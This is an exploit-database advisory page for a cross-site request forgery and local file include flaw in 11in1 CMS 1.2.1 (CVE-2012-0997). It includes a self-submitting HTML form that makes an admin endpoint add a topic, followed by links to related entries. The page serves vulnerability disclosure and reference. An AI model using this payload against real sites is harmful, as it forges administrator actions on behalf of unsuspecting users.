Lucene search
High-Tech Bridge SAEDB-ID:36786HistoryFeb 15, 2012 - 12:00 a.m.
11in1 CMS 1.2.1 - Cross-Site Request Forgery (Admin Password)
2012-02-1500:00:00
High-Tech Bridge SA
www.exploit-db.com
17
source: https://www.securityfocus.com/bid/52025/info
11in1 is prone to a cross-site request-forgery and a local file include vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the affected application.
11in1 1.2.1 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/admin/index.php?class=do&action=addTopic" method="post">
<input type="hidden" name="name" value="New Topic Name here">
<input type="hidden" name="sec" value="3">
<input type="hidden" name="content" value="New Topic Content here">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>Related
prion
prion
Cross site request forgery (csrf)
2012-02-24 13:55:00
cve
cve
CVE-2012-0997
2012-02-24 13:55:02
nvd
nvd
CVE-2012-0997
2012-02-24 13:55:02
cvelist
cvelist
CVE-2012-0997
2012-02-20 19:00:00
htbridge
htbridge
Multiple vulnerabilities in 11in1
2012-01-25 00:00:00
openvas
openvas
11in1 Cross Site Request Forgery and Local File Include Vulnerabilities
2012-02-16 00:00:00
11in1 Cross Site Request Forgery and Local File Include Vulnerabilities
2012-02-16 00:00:00
securityvulns
securityvulns
Multiple vulnerabilities in 11in1
2012-02-22 00:00:00
packetstorm
packetstorm